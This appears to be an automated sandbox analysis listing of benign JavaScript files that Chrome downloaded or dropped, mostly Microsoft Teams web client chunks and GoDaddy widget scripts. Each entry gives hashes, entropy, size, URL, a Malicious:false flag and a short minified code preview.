                                                                                                                                                                                                                          SHA1:C9AC25CF2AB6163F1C8288A3E32E669785CD4021
                                                                                                                                                                                                                          SHA-256:F766D7CA6D6CBC1572B1DA8B46566A26B1BAFC66487193886FC2CD9190E42944
                                                                                                                                                                                                                          SHA-512:570FD69E553A4E228D9DC003A204F91D183A9801AB0EE9A99D696B1E7808B31F312453DA26704A36D794BD84E7A834BFD36C3A6E5DFD7C63F4E128DE9A2821A3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[19528],{408501:r=>{r.exports=function(r,t,n){switch(n.length){case 0:return r.call(t);case 1:return r.call(t,n[0]);case 2:return r.call(t,n[0],n[1]);case 3:return r.call(t,n[0],n[1],n[2])}return r.apply(t,n)}},816349:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length;++n<e&&!1!==t(r[n],n,r););return r}},44953:(r,t,n)=>{var e=n(939767);r.exports=function(r,t){return!!(null==r?0:r.length)&&e(r,t,0)>-1}},875597:r=>{r.exports=function(r,t,n){for(var e=-1,o=null==r?0:r.length;++e<o;)if(n(t,r[e]))return!0;return!1}},816920:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length,o=Array(e);++n<e;)o[n]=t(r[n],n,r);return o}},698078:r=>{r.exports=function(r){return r.split("")}},907001:(r,t,n)=>{var e=n(314172),o=n(484636);r.exports=function(r,t,n){(void 0!==n&&!o(r[t],n)||void 0===n&&!(t in r))&&e(r,t,n)}},872791:(r,t,n)=>{var e=n(314172),o=n(484636),u=Object.prototype.hasOwnProp
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):191032
                                                                                                                                                                                                                          Entropy (8bit):4.954968823799765
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:csEk1wI5NFTL45cwYLfrbj52Dd0l2jQkNT5gpdLb96XreEHtfwUzkSK17KipnH+N:csINIwLMX1PENczqY2KvHI
                                                                                                                                                                                                                          MD5:C8DF3DBE1D696D0E5387D3E7832C955C
                                                                                                                                                                                                                          SHA1:10B96DB61F7A9087085F73E11552867FEC508040
                                                                                                                                                                                                                          SHA-256:A3D9D922252F50C420F9443E2CA225167FE1ACF816E2D66EED2594DFAA2692F7
                                                                                                                                                                                                                          SHA-512:5B359123DD48A206035A5FCC5FABC1C8C5BFF34611AAE4B3ACCE067C18B41ECA1D57FF9F6BC58987731A473BE24AAC344BCCEF8D4FAFE4A7DC2ECF5513869A75
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[704334],{704334:(e,t,a)=>{a.d(t,{NS:()=>n,L8:()=>i,gH:()=>o,hj:()=>r,pD:()=>l,Jk:()=>s,FX:()=>c,X0:()=>d,PX:()=>g,jQ:()=>v,YM:()=>S,_c:()=>f,Yf:()=>y,aQ:()=>I,Wy:()=>w,qd:()=>T,o8:()=>A,YL:()=>k,P2:()=>R,ln:()=>E,Vm:()=>P,lq:()=>D,LW:()=>M,PC:()=>F,hE:()=>L,N_:()=>U,nM:()=>O,T4:()=>N,HZ:()=>V,af:()=>B,Kp:()=>x,g5:()=>W,fp:()=>z,PR:()=>j,vm:()=>q,vd:()=>H,XL:()=>G,tY:()=>Q,cL:()=>J});var n,i,o,r,l,s,c,d,_=a(8435);!function(e){e.PREJOIN="prejoin",e.PLUGIN="plugin"}(n||(n={})),function(e){e.none="None",e.citrix="Citrix",e.vmware="VMware",e.avd="AVD",e.windows365="Windows365",e.citrixSlimCore="CitrixSlimCore",e.vmwareSlimCore="VMwareSlimCore",e.avdSlimCore="AVDSlimCore",e.windows365SlimCore="Windows365SlimCore",e.awsSlimCore="AWSSlimCore"}(i||(i={})),function(e){e.none="",e[e.wvd=43]="wvd",e[e.citrixXenDesktop=44]="citrixXenDesktop",e[e.citrixXenApp=44]="citrixXenApp",e[e.vmware=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (29343)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):29451
                                                                                                                                                                                                                          Entropy (8bit):5.2658132803400886
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:BgErDRxmNsJwEtTkst3pWbyRgGDEksG0JsYTCk84PzQDsS4Tipyt1nYbo:N3RxmNs7hkxy3hsNJcJgr
                                                                                                                                                                                                                          MD5:59E0FBEB3A39FE773441F4B7CAC3E7E0
                                                                                                                                                                                                                          SHA1:0ACE00DDB87FCEBF156D254B06ABDE95E799EFE3
                                                                                                                                                                                                                          SHA-256:E6C9294A98216CBFB2C4189AA7BBF9FA01A820D28DC61DD1531BCE2A6F389B5B
                                                                                                                                                                                                                          SHA-512:441EE99881ACE88697CF3DB9F7C7F5D7DF78918D6C798E46C73791405CBBF0C7BF4ACEB176C36D25055C13389B4C284D0D2BA6A8EFAFCBD3F23806CAD0497F6C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[657660],{469218:(e,t,i)=>{var r;i.d(t,{f:()=>I}),function(e){e.p720="720p",e.p1080="1080p",e.p2k="2k",e.p4k="4k",e.unkown="unkown"}(r||(r={}));const s=2073600,n=3686400,a=8294400;async function o(e){const t={Perf_Screen:void 0};let i;const o=e.screen.availWidth*e.screen?.availHeight;return i=o<s?r.p720:o>=s&&o<n?r.p1080:o>=n&&o<a?r.p2k:o>=a?r.p4k:r.unkown,t.Perf_Screen={width:e.screen?.availWidth,height:e.screen?.availHeight,resolution:i,dpr:e.devicePixelRatio},Promise.resolve(t)}var c;!function(e){e.Initializing="Initializing",e.Unrecoverable="Unrecoverable",e.LongInactive="LongInactive",e.Inactive="Inactive",e.Active="Active",e.VeryActive="VeryActive"}(c||(c={}));var l=i(492090),p=i(332752),d=i(34655),h=i(873529),u=i(464122);async function m(e,t,i){const r={workers:[],processes:[],windows:[]},s=await(e?.loadModule("heartbeat"));if(!s?.getPerfMetrics)return r;const n=r;try{l
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (46888)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):46996
                                                                                                                                                                                                                          Entropy (8bit):5.108957386891247
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ah4GRVGB3+pCxxesNuoDEcv9FLuCn+MAr7F4wZZMxhD:wSe6fDEoLuVMArLZZMxx
                                                                                                                                                                                                                          MD5:B318139959F84BFCD9194D8BBA1F1797
                                                                                                                                                                                                                          SHA1:48A05E8B5EBDB233C28F154AAFB164903ACEBF21
                                                                                                                                                                                                                          SHA-256:9782CDAE931F663CDFC8BBCDE6A7C99B872B6382661863D7E96C76F075469063
                                                                                                                                                                                                                          SHA-512:B340FA47578450E78009080790C0412251A9171E532ABBC9EF7ED65AAA200968E3A7B68242F85A401657E28BBDBD9A979E2544755BC752ED431BD937D3CA6FE1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[183153],{878709:(e,t,n)=>{e.exports=n(765583)},140906:(e,t,n)=>{var o=e.exports=n(490627),r=/\s+/,i={};o.Callbacks=function(e){e="string"==typeof e?i[e]||function(e){var t=i[e]={};return o.each(e.split(r),(function(e,n){t[n]=!0})),t}(e):o.extend({},e);var t,n,a,c,s,l,u=[],d=!e.once&&[],p=function(o){for(t=e.memory&&o,n=!0,l=c||0,c=0,s=u.length,a=!0;u&&l<s;l++)if(!1===u[l].apply(o[0],o[1])&&e.stopOnFalse){t=!1;break}a=!1,u&&(d?d.length&&p(d.shift()):t?u=[]:g.disable())},g={add:function(){if(u){var n=u.length;!function t(n){o.each(n,(function(n,r){var i=o.type(r);"function"===i?e.unique&&g.has(r)||u.push(r):r&&r.length&&"string"!==i&&t(r)}))}(arguments),a?s=u.length:t&&(c=n,p(t))}return this},remove:function(){return u&&o.each(arguments,(function(e,t){for(var n;(n=o.inArray(t,u,n))>-1;)u.splice(n,1),a&&(n<=s&&s--,n<=l&&l--)})),this},has:function(e){return o.inArray(e,u)>-1},empty:function()
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33266)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):33374
                                                                                                                                                                                                                          Entropy (8bit):5.170268480848515
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:JkQajjwCbtihMF2vwh8R5VOdJXLIgqx6fj0K:J9h/vwhOWcgq+R
                                                                                                                                                                                                                          MD5:40832E67D4391FFDB1613F7DB5F33076
                                                                                                                                                                                                                          SHA1:70382211316199F58BC0D3D56C2A98C81849E11D
                                                                                                                                                                                                                          SHA-256:9A525A37F6D2471F7E74B15172D469DAA14C47096827395DDEB769BFE2E4590A
                                                                                                                                                                                                                          SHA-512:707F2BE3C1177E85036AD8163ADA6FBC33F000F83AE80F6F80A5D32D8FB787CE51C6EB129D0541D6D3C2BE7C277985C380A8EDF4B1AD67061019CE266E917FE4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/337355-53949d9632bb831d.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[337355],{327402:function(t,r){var e,n,o;n=[],void 0===(o="function"==typeof(e=function(){var t=/^v?(?:\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+))?(?:-[\da-z\-]+(?:\.[\da-z\-]+)*)?(?:\+[\da-z\-]+(?:\.[\da-z\-]+)*)?)?)?$/i;function r(t,r){return-1===t.indexOf(r)?t.length:t.indexOf(r)}function e(t){var e=t.replace(/^v/,"").replace(/\+.*$/,""),n=r(e,"-"),o=e.substring(0,n).split(".");return o.push(e.substring(n+1)),o}function n(t){return isNaN(Number(t))?t:Number(t)}function o(r){if("string"!=typeof r)throw new TypeError("Invalid argument expected string");if(!t.test(r))throw new Error("Invalid argument not valid semver ('"+r+"' received)")}function i(t,r){[t,r].forEach(o);for(var i=e(t),s=e(r),c=0;c<Math.max(i.length-1,s.length-1);c++){var u=parseInt(i[c]||0,10),a=parseInt(s[c]||0,10);if(u>a)return 1;if(a>u)return-1}var f=i[i.length-1],l=s[s.length-1];if(f&&l){var p=f.split(".").map(n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):97386
                                                                                                                                                                                                                          Entropy (8bit):5.409202916101396
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:AYOFtBcBgh/A3ckqBWqnq/eygnuOXwWQa01bYO1MCt8q:AYOFCf/cq/NRr1MNCtF
                                                                                                                                                                                                                          MD5:DEB6CC65C69E068DFB8E094926954D7F
                                                                                                                                                                                                                          SHA1:1FB93B19BC2FA21B1BF08BE5916FB62D34F3438E
                                                                                                                                                                                                                          SHA-256:C6074B5366BBDEC84AAF41BC66C753A96F3850C5A9E3F8974073B32F2956CEE8
                                                                                                                                                                                                                          SHA-512:54DB639E45E7904BD9C3C36ED8C555FEBFD5CA1C8381E61056BE75B4138A6638B1120C031FFBCEF6D316C5150E47796A76B082D48E7D57237A10F69D11917D50
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[747607],{872994:(n,t,e)=>{e.d(t,{_:()=>H});var r=e(340415),i=e(344411),u=e(759377),o=e(179233),a=e(680828),c=e(260026),f=e(215729),l=e(490507),s=e(722990),v=e(268288),d=e(498863),g=e(661187),h=e(952741),y=e(246904),p=e(483152),m=e(679080),b=e(779497),I=e(287856);var S,w=function(n){function t(){var e,r,u=n.call(this)||this;function a(){e=0,r=[]}return u.identifier="TelemetryInitializerPlugin",u.priority=199,a(),(0,i.A)(t,u,(function(n,t){n.addTelemetryInitializer=function(n){return function(n,t,e){var r={id:t,fn:e};return(0,o.Yny)(n,r),{remove:function(){(0,o.Iuo)(n,(function(t,e){if(t.id===r.id)return n[c.Ic](e,1),-1}))}}}(r,e++,n)},n[y.qT]=function(t,e){(function(n,t,e){for(var r=!1,i=n[c.oI],u=0;u<i;++u){var a=n[u];if(a)try{if(!1===a.fn[c.y9](null,[t])){r=!0;break}}catch(n){(0,g.ZP)(e,2,64,"Telemetry initializer failed: "+(0,h.lL)(n),{exception:(0,o.mmD)(n)},!0)}}return!r}
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):266
                                                                                                                                                                                                                          Entropy (8bit):5.182741116673583
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:F9oNS2BSyRbWsCJwvYtMe1mGHr9EJiKWaO6SZF:HgS2BSyEsCJB1THr+pWIS7
                                                                                                                                                                                                                          MD5:8578A331AD09BB2EF6359FEC3916BEFC
                                                                                                                                                                                                                          SHA1:38B68F5C02CBDB6E29C50F8858710E0392B0B8D6
                                                                                                                                                                                                                          SHA-256:3D7E7552E3801941A408C504AA732223FE2BED5D12E248680847D772182CB639
                                                                                                                                                                                                                          SHA-512:B034DDDA04F8DEE0D174651D13A89AF9FE5ED28E1E81FAB229AFA119B9B0A9C418E324FFCE28E909D8D596BEAE98FA1AC0BA09C74E7E7689B945C032088C5E18
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/c/_react_commonjs-external-a1351e34.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/_react_commonjs-external-a1351e34.js",["exports"],(function(e){"use strict";const n=global.React||guac.react;e._=n})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_react_commonjs-external-a1351e34.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (36103)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):36211
                                                                                                                                                                                                                          Entropy (8bit):5.261480504529277
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:vFORCEcOC/BExYLil95/8ZpA2Me/vDwYNtvE:vVZNLie73ZtvE
                                                                                                                                                                                                                          MD5:7F5787BE53067A2AD5210A29F8E320F9
                                                                                                                                                                                                                          SHA1:B6A10C98183301615C2C8350B537793049940A96
                                                                                                                                                                                                                          SHA-256:B85FC31F32AC2F798BBBE739B1D0CD3D199DBFA2D92F86C0159EF4FB2520CBD4
                                                                                                                                                                                                                          SHA-512:E0E3662E5AC05FADF7F25D1639617B5DD31ECF5CD37142B81F64AF9FEC1B61BBCE1B3B911D2AD303E11BCB395325051D941814D2663D9764038552E2C8AF4281
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/712315-4d70afe314e618ce.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[712315],{805627:function(e,t,n){var o,r=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])},function(e,t){function n(){this.constructor=e}o(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)});Object.defineProperty(t,"__esModule",{value:!0});var i,s=n(535817),a=n(337315),l=function(){function e(e){this._formatter=e||new c}return e.prototype.formatter=function(){return this._formatter},e.prototype.receiveAll=function(){return!1},e.prototype.levels=function(){return null},e}();function u(e){return(4294967296+e).toString(16).substr(-8)}function f(e,t){return(1e12+e).toString(10).substr(-t)}t.AbstractLogAppender=l,function(e){e[e.Timestamp=1]="Timestamp",e[e.Component=4]="Component",e[e.Level=8]="Level",e[e.FullDate=32]="FullDate",e[e.Lo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (786)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):842
                                                                                                                                                                                                                          Entropy (8bit):5.258991916821592
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:caBL+qMLVRGqawadlH0rVRrkAeT25Z2HrIY/:jKqSVMqzarH0brkAeq5ZSrI+
                                                                                                                                                                                                                          MD5:31B521136207C11FF1F9985264424E8A
                                                                                                                                                                                                                          SHA1:9EAF6B9717979CAEB5C7E846E17B2A89A08DC266
                                                                                                                                                                                                                          SHA-256:C818B56446AE5A8D0466FC9C51D85104584E36F6D8B1C77E08A2D354E845E2CD
                                                                                                                                                                                                                          SHA-512:DB2A8825F8C67B6361B86F5BB1DEE38089DD57E5E74ECBA335EF7D82D9D5E5AD3F64C07195FCDF700415F6F09B11BDB6A20410462ABAEC443335F19ACF8265B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-themeOverrides-e736c017.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-themeOverrides-e736c017.js",["exports"],(function(e){"use strict";(global.Core||guac["@wsb/guac-widget-core"]).constants;e.a=e=>{let{sectionHeadingHR:t}=e;return t?{sectionHeadingHR:t}:{}},e.b=e=>{let{sectionHeadingColor:t}=e;return{HIGHLIGHT:{style:{color:"highlight"}},HIGH_CONTRAST:{style:{color:"highContrast"}}}[t]||{}},e.c=e=>{let{sectionHeadingSize:t}=e;return t?{style:{fontSize:t}}:{}},e.s=e=>{let{sectionHeadingAlignment:t}=e;return{LEFT:{style:{textAlign:"left","@md":{textAlign:"left"}},alignmentOption:"left"},CENTER:{style:{textAlign:"center","@md":{textAlign:"center"}},alignmentOption:"center"},RIGHT:{style:{textAlign:"right","@md":{textAlign:"right"}},alignmentOption:"right"}}[t]||{}}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-themeOverrides-e736c017.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (28072)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):28179
                                                                                                                                                                                                                          Entropy (8bit):5.227607445648655
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:/8XyeuhomhaOs2UksOiRTtBEUkZrJvM7KqvZwr:quXa1+JvM7KAZm
                                                                                                                                                                                                                          MD5:D59AC3434536A3CFFE78A623BA737216
                                                                                                                                                                                                                          SHA1:56101E26061017929AF754CEA4AE361543E3BB15
                                                                                                                                                                                                                          SHA-256:4493BF71F4693A47C722B457C5BDBEFC5F26F315C03E448FC3E5B32AE14BC123
                                                                                                                                                                                                                          SHA-512:665EDB71A622BA51A8C8C39EE11D662B1A92BC56897CE7C8BC5D768E616E6EE9427748D08939B39704A3F5319F2065B3120110BF930BFE2CBB4F1B975B99C981
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/96611-20373bce5580a2d1.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[96611],{306766:(e,n,t)=>{t.d(n,{u$:()=>i,EY:()=>a,wu:()=>o,fS:()=>l,Xd:()=>r,Zb:()=>s,vT:()=>d});var i,a,o,l,r,s,d;!function(e){e.SingleWindowExperience="single-window-experience",e.MultiWindowExperience="multi-window-experience"}(i||(i={})),function(e){e.NavigatePromiseBiMError="navigate-promise-bim-error",e.DuplicateScenarioCreation="duplicate-scenario-creation",e.IntentIdUndefined="intent-id-undefined"}(a||(a={})),function(e){e.ScenarioNotFound="scenario-not-found",e.IntentNotFoundForCallingWindowingIntentId="intent-not-found-for-calling-windowing-intent-id",e.ContainerNotFoundForCallingWindowingIntentId="container-not-found-for-calling-windowing-intent-id",e.InvalidUpdateType="invalid-update-type",e.ContainerRenderFailed="container-render-failed"}(o||(o={})),function(e){e.CloseContainerFailed="close-container-failed",e.CloseContainerTimeout="close-container-timeout",e.Int
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (32044)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32419
                                                                                                                                                                                                                          Entropy (8bit):5.797705170929871
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:EpWNBatM8Ed62M5uDMdjxE91u8MmbxScpv44rmjLoMCCfRz/6TBOgRZJCFE/b7fn:EMAxEtbwcpv44rK8MCCJz/6TBOgRZjn
                                                                                                                                                                                                                          MD5:D581DCBA24EDA38CCB1B9DCBFBA04576
                                                                                                                                                                                                                          SHA1:985D6D529A80396D0C476722FAF720691662A8B4
                                                                                                                                                                                                                          SHA-256:297960DE324847D359173E56354770E515F873302163D012EB415D293CD8D928
                                                                                                                                                                                                                          SHA-512:D3726B6F0BDC59E3C306B92B0372F8E94C64C1C5B95352C2EA36F952E8E12FDD7D48244A62CAC33E6816A9D32C84E3D930EE93BFA5B943982E4C9B5636BB015F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[396573],{461190:(e,t,s)=>{var n,i,o;s.d(t,{pG:()=>n,Ly:()=>i,Mv:()=>o}),function(e){e.ComposeMessage="composeMessage",e.PostCompose="postCompose",e.MessageList="messageList",e.Powerbar="powerbar",e.VirtualTreeList="virtualTreeList",e.FeedsFilter="feedsFilter",e.PeoplePicker="peoplePicker",e.SearchBox="searchBox",e.Floodgate="floodgate",e.ChatListSearchFilter="chatListSearchFilter",e.ChannelListSearchFilter="channelListSearchFilter",e.CallingPerf="callingPerf",e.TeamsAndChannelsTable="teamsAndChannelsTable",e.DiscoverSurfaceFeedList="discoverSurfaceFeedList",e.AllChannelSystemMessages="channelInfoPaneAllSystemMessages",e.AllPinnedPosts="channelInfoPaneAllPinnedPosts",e.UnifiedFunPicker="unifiedFunPicker",e.CreateTeamGallery="createTeamGallery",e.AddMember="addMember",e.MeetForWorkList="meetForWorkList",e.MeetForWorkSearchFilter="meetForWorkSearchFilter",e.PeopleAppContactList=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (29023)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):29128
                                                                                                                                                                                                                          Entropy (8bit):5.5730044734015305
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:5zpVptEWy8YJj4YXorTOBTdwTcbmtd2MysGVqmWyaX/1l:5zpVvyF4/OBTj2LymysT
                                                                                                                                                                                                                          MD5:7E044AB4B512045FB41758E79FF154C8
                                                                                                                                                                                                                          SHA1:4D1E0B07E606608460B6CA2141A772431A1CAD87
                                                                                                                                                                                                                          SHA-256:1AF56B2FBB95A6DFFC43CC598F7D0CD39CAEEC7D9C172936867568743799B951
                                                                                                                                                                                                                          SHA-512:28BBB85FE605C332469AECEBECC880C6D13C579B6297457271E0890789572D2C2A699B69BEB6E82CE090486669E94FC8837F8B354DA0C7E329F20FE70F821F35
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[693],{805809:(e,t,n)=>{"use strict";var i,a;n.d(t,{p:()=>i,f:()=>a}),function(e){e.ActiveDirectoryGroupService="ActiveDirectoryGroupService",e.AiInsightsFeedbackService="AiInsightsFeedbackService",e.AppService="appservice",e.AppStudio="appstudio",e.AMS="asyncMediaService",e.AtpSafelinksService="atpSafelinksService",e.Attendee="attendee",e.AllFiles="allFiles",e.Auth="auth",e.Badger="badger",e.BRB="brb",e.CDN="cdn",e.CallingConversationService="callingConversationService",e.ChannelNotificationSettings="channelNotificationSettings",e.CognitiveService="cognitiveService",e.ChatService="chatservice",e.CMDArtifactsService="cmdArtifactsService",e.CmdMeetingIntelligenceService="cmdMeetingIntelligenceService",e.CMDServices="cmdServices",e.CNS="cns",e.CollabCloudService="collabCloudService",e.CSA="csa",e.CustomEmoji="customEmoji",e.CXCS="cxcs",e.DynamicsMarketing="dynamicsMarketing",e.DynamicsVirtua
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):545272
                                                                                                                                                                                                                          Entropy (8bit):5.262263354720842
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:qnEtHYxEBCl/xHHP1IxyynnRnJaqD8EULhS7KqwOmdivKJBjPpSYd:qnE5YCBCvPuxZncYfwfBDpRd
                                                                                                                                                                                                                          MD5:9134B5678799A501B8B97AAF92F63387
                                                                                                                                                                                                                          SHA1:9C9DA5A849506D5CCEA2BF0334680B40C07017D9
                                                                                                                                                                                                                          SHA-256:CB39974B85C38817BCA655C969E85AA49EFF2AA22A525C44082A8DB48C856000
                                                                                                                                                                                                                          SHA-512:188A3DA8AB85790AFCADC53B80FDC503CD9132708FF867E428BB5D69DF06BAEC99F9E5A7534230868949C587FC014A1C7596490213ADA5DE6EDCD97D53F66EC5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/443192-5c28040beb13153d.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[443192],{840432:(e,t,n)=>{"use strict";n.d(t,{H:()=>Ea});var r=n(329806),i=n(795317);function o(e){if(!e)throw new Error("Invariant violation")}function a(...e){throw new Error("Unexpected member of typed union: \n"+JSON.stringify(e))}function s(e,t,n){const r=e.get(t);void 0===r?e.set(t,[n]):r.push(n)}function u(e,t,n){let r=e.get(t);return void 0===r&&(r=n(),e.set(t,r)),r}var l=n(132786),c=0,f=1,d=2,p=3,h=4,v=5,g=6,y=7,_=8,m=n(193272),b=Object.defineProperty,E=Object.defineProperties,R=Object.getOwnPropertyDescriptors,S=Object.getOwnPropertySymbols,w=Object.prototype.hasOwnProperty,O=Object.prototype.propertyIsEnumerable,k=(e,t,n)=>t in e?b(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,I={kind:"Field",name:{kind:"Name",value:"__typename"}};function A(e){return"Field"===e.kind}var D=Object.assign((function(e){return(0,m.YR)(e,{SelectionSet:{enter(e,t,n){if(n&&"Operation
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (35485)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):35593
                                                                                                                                                                                                                          Entropy (8bit):5.433201153959229
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:BUd8hDG5Tf4TCvJIuyxof+JuJAXNh4ptwBKPQ7KcnwCVJp8FsnxMhRnA:KdgO0LXy+JuJAXNKp6BKPQJnwCRNxMha
                                                                                                                                                                                                                          MD5:614CEF6A5591243EE327D5D2B7A2C698
                                                                                                                                                                                                                          SHA1:A30288FE3D15BFEDC3E3B73B18A2ADA72BD43ABB
                                                                                                                                                                                                                          SHA-256:8D81DC89757CB48425F7781F7FB889913FD959E96F977CA03F2BF19C571D9B72
                                                                                                                                                                                                                          SHA-512:A37C171BE9894AA1EEA99374626498E734F9D3A632FEEB41E308D6D2142FBBB99CE48B101F29EA87FD7C736BC4300686371C755D56A828BCED9C5013B7CA0F1D
                                                                                                                                                                                                                          Malicious:false
